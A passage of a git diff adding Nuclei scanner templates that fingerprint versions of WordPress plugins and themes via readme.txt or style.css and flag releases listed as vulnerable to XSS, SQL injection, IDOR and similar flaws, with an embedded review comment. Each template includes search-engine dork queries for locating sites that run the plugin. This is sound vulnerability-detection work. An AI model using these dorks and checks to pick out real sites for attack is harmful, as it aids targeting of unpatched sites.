+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.7')
\ No newline at end of file
diff --git a/poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml b/poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml
new file mode 100644
index 0000000000..de36fa2948
--- /dev/null
+++ b/poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml
@@ -0,0 +1,59 @@
+id: learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb
+
+info:
+ name: >
+ Masteriyo - LMS <= 1.11.4 - Authenticated (Student+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3d7a587-042d-4ba1-9373-aaeb24c711f5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/learning-management-system/"
+ google-query: inurl:"/wp-content/plugins/learning-management-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,learning-management-system,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/learning-management-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "learning-management-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.11.4')
\ No newline at end of file
diff --git a/poc/other/mediavine-create-621425e43450aac270f2eee9af5c5ee9.yaml b/poc/other/mediavine-create-621425e43450aac270f2eee9af5c5ee9.yaml
new file mode 100644
index 0000000000..ce529c171e
--- /dev/null
+++ b/poc/other/mediavine-create-621425e43450aac270f2eee9af5c5ee9.yaml
@@ -0,0 +1,59 @@
+id: mediavine-create-621425e43450aac270f2eee9af5c5ee9
+
+info:
+ name: >
+ Create by Mediavine <= 1.9.8 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c04e40a-6d94-4688-9159-07bf27a9efe0?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mediavine-create/"
+ google-query: inurl:"/wp-content/plugins/mediavine-create/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mediavine-create,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mediavine-create/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mediavine-create"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9.8')
\ No newline at end of file
diff --git a/poc/other/modal-window-d5049720f6b9e25c27b98f22996df247.yaml b/poc/other/modal-window-d5049720f6b9e25c27b98f22996df247.yaml
new file mode 100644
index 0000000000..48bbce8456
--- /dev/null
+++ b/poc/other/modal-window-d5049720f6b9e25c27b98f22996df247.yaml
@@ -0,0 +1,59 @@
+id: modal-window-d5049720f6b9e25c27b98f22996df247
+
+info:
+ name: >
+ Modal Window <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7790777d-9421-48c6-b789-f1feab109ec7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/modal-window/"
+ google-query: inurl:"/wp-content/plugins/modal-window/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,modal-window,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/modal-window/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "modal-window"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.3')
\ No newline at end of file
diff --git a/poc/other/mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769.yaml b/poc/other/mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769.yaml
new file mode 100644
index 0000000000..0417d8a614
--- /dev/null
+++ b/poc/other/mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769.yaml
@@ -0,0 +1,59 @@
+id: mybooktable-4001d26bb4ecdae4d7bd52ea8c3e8769
+
+info:
+ name: >
+ MyBookTable Bookstore <= 3.3.9 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b614aab2-a3e3-410a-917b-cc33634503ce?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mybooktable/"
+ google-query: inurl:"/wp-content/plugins/mybooktable/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mybooktable,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mybooktable/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mybooktable"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.9')
\ No newline at end of file
diff --git a/poc/other/orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac.yaml b/poc/other/orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac.yaml
new file mode 100644
index 0000000000..5c44484ba3
--- /dev/null
+++ b/poc/other/orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac.yaml
@@ -0,0 +1,59 @@
+id: orbisius-child-theme-creator-1388a1cf61f535dcb681bbd612e698ac
+
+info:
+ name: >
+ Child Theme Creator <= 1.5.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25f358b-f9b7-4660-8dda-673023dc1967?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/orbisius-child-theme-creator/"
+ google-query: inurl:"/wp-content/plugins/orbisius-child-theme-creator/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,orbisius-child-theme-creator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/orbisius-child-theme-creator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "orbisius-child-theme-creator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.4')
\ No newline at end of file
diff --git a/poc/other/page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8.yaml b/poc/other/page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8.yaml
new file mode 100644
index 0000000000..c7066d2a8a
--- /dev/null
+++ b/poc/other/page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8.yaml
@@ -0,0 +1,59 @@
+id: page-builder-add-44aa89903f2ffee1de9ece8f6a3890e8
+
+info:
+ name: >
+ Landing Page Builder <= 1.5.2.0 - Authenticated (Editor+) Local File Inlcusion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bacfa993-2fc1-43bc-b4f0-f463ba28b4ed?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/page-builder-add/"
+ google-query: inurl:"/wp-content/plugins/page-builder-add/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,page-builder-add,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/page-builder-add/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "page-builder-add"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.2.0')
\ No newline at end of file
diff --git a/poc/other/piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5.yaml b/poc/other/piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5.yaml
new file mode 100644
index 0000000000..67e49ea1bc
--- /dev/null
+++ b/poc/other/piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5.yaml
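Review bot: The `name` field misspells the vulnerability class as `Local File Inlcusion`; since this string is what appears in scanner output and is what analysts grep for during triage, it should read `Landing Page Builder <= 1.5.2.0 - Authenticated (Editor+) Local File Inclusion`. Apart from the typo the template follows the same version-fingerprint pattern as the other new files in this commit, so the empty `description` and `classification` fields raised on the e2pdf template apply here as well.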
@@ -0,0 +1,59 @@
+id: piotnet-addons-for-elementor-81ce2f8f926f79a35ddf670ee48af4b5
+
+info:
+ name: >
+ Piotnet Addons For Elementor <= 2.4.30 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/921616e4-2b66-4847-869a-90c1c459685f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/piotnet-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/piotnet-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,piotnet-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/piotnet-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "piotnet-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.30')
\ No newline at end of file
diff --git a/poc/other/propovoice-c028c15a3dc86a47681670ace75ba13e.yaml b/poc/other/propovoice-c028c15a3dc86a47681670ace75ba13e.yaml
new file mode 100644
index 0000000000..be6960971c
--- /dev/null
+++ b/poc/other/propovoice-c028c15a3dc86a47681670ace75ba13e.yaml
@@ -0,0 +1,59 @@
+id: propovoice-c028c15a3dc86a47681670ace75ba13e
+
+info:
+ name: >
+ Propovoice CRM <= 1.7.6.4 - Unauthenticated Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/25acd3d9-0c1a-426e-b670-b842f031bdc5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/propovoice/"
+ google-query: inurl:"/wp-content/plugins/propovoice/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,propovoice,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/propovoice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "propovoice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.6.4')
\ No newline at end of file
diff --git a/poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml b/poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml
new file mode 100644
index 0000000000..8076bac3cd
--- /dev/null
+++ b/poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml
@@ -0,0 +1,59 @@ +id: purity-of-soul-eb9462c64668d462d768e2cde373e11a + +info: + name: > + Purity Of Soul <= 1.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/53d2f416-4b0f-49b7-af14-fbb225aac34d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/purity-of-soul/" + google-query: inurl:"/wp-content/themes/purity-of-soul/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,purity-of-soul,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/purity-of-soul/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "purity-of-soul" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml b/poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml new file mode 100644 index 0000000000..7947626f93 --- /dev/null +++ b/poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml 
@@ -0,0 +1,59 @@ +id: responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba + +info: + name: > + Responsive Blocks – WordPress Gutenberg Blocks <= 1.8.8 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1c894de0-2ea7-4002-9c26-0e3e59744a5e?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/responsive-block-editor-addons/" + google-query: inurl:"/wp-content/plugins/responsive-block-editor-addons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,responsive-block-editor-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/responsive-block-editor-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "responsive-block-editor-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.8.8') \ No newline at end of file diff --git a/poc/other/salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b.yaml b/poc/other/salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b.yaml new file mode 100644 index 0000000000..c0be494ace --- /dev/null +++ b/poc/other/salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b.yaml 
@@ -0,0 +1,59 @@ +id: salon-booking-system-6c91068c03b4d3c474e474c51a7a4b0b + +info: + name: > + Salon booking system <= 10.8.1 - Unauthenticated Open Redirect + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8e64950-4f01-4391-8c65-2f25ff5bcc06?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/salon-booking-system/" + google-query: inurl:"/wp-content/plugins/salon-booking-system/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,salon-booking-system,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "salon-booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 10.8.1') \ No newline at end of file diff --git a/poc/other/store-locator-le-1945eefef5d2527af79b680ff46e0cd5.yaml b/poc/other/store-locator-le-1945eefef5d2527af79b680ff46e0cd5.yaml new file mode 100644 index 0000000000..62f597abb5 --- /dev/null +++ b/poc/other/store-locator-le-1945eefef5d2527af79b680ff46e0cd5.yaml 
@@ -0,0 +1,59 @@ +id: store-locator-le-1945eefef5d2527af79b680ff46e0cd5 + +info: + name: > + Store Locator Plus <= 2311.17.01 - Unauthenticated Sensitive Information Exposure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3597fa-71e2-4753-b226-5d95e576947a?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/store-locator-le/" + google-query: inurl:"/wp-content/plugins/store-locator-le/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,store-locator-le,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/store-locator-le/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "store-locator-le" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2311.17.01') \ No newline at end of file diff --git a/poc/other/structured-content-c817ba2ce17903cc737df2e15e7a24ee.yaml b/poc/other/structured-content-c817ba2ce17903cc737df2e15e7a24ee.yaml new file mode 100644 index 0000000000..76a1c07b89 --- /dev/null +++ b/poc/other/structured-content-c817ba2ce17903cc737df2e15e7a24ee.yaml 
@@ -0,0 +1,59 @@ +id: structured-content-c817ba2ce17903cc737df2e15e7a24ee + +info: + name: > + Structured Content <= 1.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/908e4755-e439-4714-b0cb-3fc546c5ac63?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/structured-content/" + google-query: inurl:"/wp-content/plugins/structured-content/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,structured-content,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/structured-content/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "structured-content" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.2') \ No newline at end of file diff --git a/poc/other/team-9f214d2d0b43c932c0c20f490727942d.yaml b/poc/other/team-9f214d2d0b43c932c0c20f490727942d.yaml new file mode 100644 index 0000000000..8bc20c5ec4 --- /dev/null +++ b/poc/other/team-9f214d2d0b43c932c0c20f490727942d.yaml 
@@ -0,0 +1,59 @@ +id: team-9f214d2d0b43c932c0c20f490727942d + +info: + name: > + Team Showcase <= 1.22.23 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f702fef0-8f07-4c94-bbf7-394d66f9ddde?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/team/" + google-query: inurl:"/wp-content/plugins/team/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,team,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/team/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "team" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.22.23') \ No newline at end of file diff --git a/poc/other/tutor-73b95a02c60b2d8fc29e4d380e9a408f.yaml b/poc/other/tutor-73b95a02c60b2d8fc29e4d380e9a408f.yaml new file mode 100644 index 0000000000..198a9a9d57 --- /dev/null +++ b/poc/other/tutor-73b95a02c60b2d8fc29e4d380e9a408f.yaml 
@@ -0,0 +1,59 @@ +id: tutor-73b95a02c60b2d8fc29e4d380e9a408f + +info: + name: > + Tutor LMS <= 2.7.2 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/839b68e6-0462-4f88-ac13-ed4b69887d6b?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tutor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tutor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file diff --git a/poc/other/ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb.yaml b/poc/other/ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb.yaml new file mode 100644 index 0000000000..5c685bf65b --- /dev/null +++ b/poc/other/ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb.yaml 
@@ -0,0 +1,59 @@ +id: ultimate-store-kit-34c1e94782b55b611d35e47ac7b7afcb + +info: + name: > + Ultimate Store Kit Elementor Addons <= 1.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/51a4886b-2e15-4d91-b853-4a675120a9e9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/ultimate-store-kit/" + google-query: inurl:"/wp-content/plugins/ultimate-store-kit/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,ultimate-store-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-store-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-store-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.4') \ No newline at end of file diff --git a/poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml b/poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml new file mode 100644 index 0000000000..5dc0c218c2 --- /dev/null +++ b/poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml 
@@ -0,0 +1,59 @@ +id: visual-composer-starter-6909271bdc06f95eea673edff022023b + +info: + name: > + Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/visual-composer-starter/" + google-query: inurl:"/wp-content/themes/visual-composer-starter/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,visual-composer-starter,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "visual-composer-starter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.3') \ No newline at end of file diff --git a/poc/other/wemail-5fb8bcbdd6e11191313c75649788eb26.yaml b/poc/other/wemail-5fb8bcbdd6e11191313c75649788eb26.yaml new file mode 100644 index 0000000000..bb7565ddec --- /dev/null +++ b/poc/other/wemail-5fb8bcbdd6e11191313c75649788eb26.yaml 
@@ -0,0 +1,59 @@ +id: wemail-5fb8bcbdd6e11191313c75649788eb26 + +info: + name: > + weMail <= 1.14.5 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/82e9bd78-726f-421f-8bf0-560fa9eeab2c?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wemail/" + google-query: inurl:"/wp-content/plugins/wemail/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wemail,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wemail/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wemail" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.14.5') \ No newline at end of file diff --git a/poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml b/poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml new file mode 100644 index 0000000000..038c903fa0 --- /dev/null +++ b/poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml 
